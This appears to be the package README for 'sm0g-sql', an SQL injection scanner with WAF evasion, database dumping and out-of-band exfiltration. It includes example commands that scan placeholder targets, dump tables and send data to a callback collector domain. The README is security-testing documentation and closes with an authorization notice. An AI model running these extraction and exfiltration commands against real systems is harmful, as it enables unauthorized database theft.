sm0g-sql 0.1.5

SM0GSQL — Context-aware SQL injection scanner with WAF detection and evasion

SM0GSQL

Context-aware SQL injection scanner with WAF detection, evasion, and one-command data extraction.

+--------------------------------------------------------------+
|                                                              |
|╭╌╌╌╌╌╌╌╌╌╌╌╌╌╮ ╭╌╌╌╌╌╌╌╌╌╌╌╌╌╮ ╭╌╌╌╌╌╌╌╌╌╌╌╌╌╮ ╭╌╌╌╌╌╌╌╌╌╌╌╌╮|
|╎   ◎ INFIL   ╎ ╎  ◈ BYPASS   ╎ ╎  ▣ OPERATE  ╎ ╎ ⊟ EXTRACT  ╎|
|╰╌╌╌╌╌╌╌╌╌╌╌╌╌╯ ╰╌╌╌╌╌╌╌╌╌╌╌╌╌╯ ╰╌╌╌╌╌╌╌╌╌╌╌╌╌╯ ╰╌╌╌╌╌╌╌╌╌╌╌╌╯|
|                                                              |
+==============================================================+
|   _____ __  __  ___   _____  _____  ____  _                  |
|  / ____|  \/  |/ _ \ / ____|/ ____|/ __ \| |                 |
| | (___ | \  / | | | | |  __| (___ | |  | | |                 |
|  \___ \| |\/| | | | | | |_ |\___ \| |  | | |                 |
|  ____) | |  | | |_| | |__| |____) | |__| | |____             |
| |_____/|_|  |_|\___/ \_____|_____/ \___\_\______|            |
+==============================================================+

---

Highlights

• 🎯 Six detection techniques — error-based, boolean-blind, time-blind, UNION, stacked-query, and out-of-band (OOB).
• ⚡ Async engine — concurrent probing over httpx; timing-sensitive checks fall back to a sequential stall mode for accurate time-based oracles.
• 🛡️ WAF fingerprinting + evasion — detects the wall in front of the app and adapts payloads to get past it.
• 💉 One-command extraction — confirm an injection and dump schemas, tables, and rows in the same run with --exploit.
• 🗄️ All major backends — MySQL/MariaDB, PostgreSQL, MSSQL, Oracle, and SQLite.
• 🕸️ Surface discovery — built-in crawler, headless-browser crawl, and OpenAPI spec ingestion.
• 📄 Reports everywhere — terminal summary plus HTML, JSON, and SARIF (CI / code-scanning) output.

Install

pip install sm0g-sql

This pulls the engine dependencies (sm0g-cli, sm0g-core, sm0g-payloads) automatically.

From source (development)

git clone <repo> && cd SM0GSQL
python -m venv .venv && source .venv/bin/activate
pip install -e ".[dev]"     # editable install + test/lint tooling
pytest -q                   # run the suite

Quick start

# scan a single URL
sm0gsql "https://target.tld/item?id=1"

# crawl first, then scan everything found
sm0gsql "https://target.tld/" --crawl

# confirm + extract in one shot (writes HTML/TXT/JSON into a per-target folder)
sm0gsql "https://target.tld/item?id=1" --exploit

Techniques

Pass any combination to --technique (default: EBTUO):

Flag	Technique	Notes
E	Error-based	Reads DBMS errors reflected in the response.
B	Boolean-blind	Differential true/false response analysis.
T	Time-blind	Time-delay oracle (uses the sequential stall mode).
U	UNION	Column-count discovery + UNION data read.
S	Stacked query	Stacked statements where the driver allows them.
O	Out-of-band	DNS/HTTP exfil via the bundled collector (below).

sm0gsql "https://target.tld/item?id=1" --technique BTU --risk 2 --level 2

Usage

sm0gsql <url> [options]

Option	Description	Default
--technique EBTUSO	Techniques to run (see table above)	EBTUO
--risk 1-3	Payload aggressiveness	1
--level 1-3	Injection-point depth	1
--dbms NAME	Backend hint: mysql, postgres, mssql, oracle, sqlite	auto
--crawl	Crawl the site before scanning	off
--crawl-depth N	Crawler depth	3
--browser-crawl	Use a headless browser to crawl	off
--openapi PATH/URL	Seed surfaces from an OpenAPI spec	—
--exploit	Extract data after a confirmed finding	off
--dump TABLE / --dump-all	Dump a table / all tables	—
--dump-rows N	Max rows per table (0 = default cap)	0
--oob DOMAIN	OOB callback domain	—
--oob-poll URL	Endpoint returning observed callbacks	—
--login-url / --login-user / --login-pass	Authenticate before scanning	—
-H "Name: Value"	Add a header (repeatable)	—
--cookies "k=v; ..."	Cookie string	—
--proxy URL	Route traffic through an HTTP proxy	—
--evasion MODE	WAF-evasion transform(s)	—
--random-agent	Rotate the User-Agent	off
--threads N	Concurrency	5
--timeout N / --delay S	Request timeout / per-request delay	15 / 0
--time-threshold N	Time-based oracle threshold (s)	4
--verify-ssl	Verify TLS certificates	off
-d, --data BODY	POST body	—
--output-json / --output-sarif / --report-html PATH	Write reports	—
-v, --verbose	Verbose output	off

Out-of-band extraction

OOB techniques exfiltrate data through DNS/HTTP callbacks. A minimal collector ships with the package as the sm0gsql-oob command — run it on a host the target can reach:

sudo sm0gsql-oob          # DNS on udp/53, poll endpoint on http://0.0.0.0:8000/poll

Then point the target's resolver at that box and run the scan:

sm0gsql "https://target.tld/item?id=1" \
  --technique O --oob exfil.your-domain.tld \
  --oob-poll http://your-collector:8000/poll

Binding udp/53 requires root / CAP_NET_BIND_SERVICE.

Output & reports

• Terminal — a colored summary of every confirmed finding.
• --exploit — writes JSON + TXT + HTML into a ./<target-host>/ folder.
• --report-html / --output-json / --output-sarif — emit individual reports anywhere; SARIF plugs straight into CI / code-scanning.

Authorization & legal

SM0GSQL is for authorized security testing only — penetration tests, bug-bounty programs within scope, CTFs, and your own lab/staging systems. Running it against systems you do not own or have explicit written permission to test is illegal in most jurisdictions. You are solely responsible for how you use this tool.

License

AGPL-3.0-or-later — Copyright (c) 2026 SM0G-SEC by roc1t1z3not.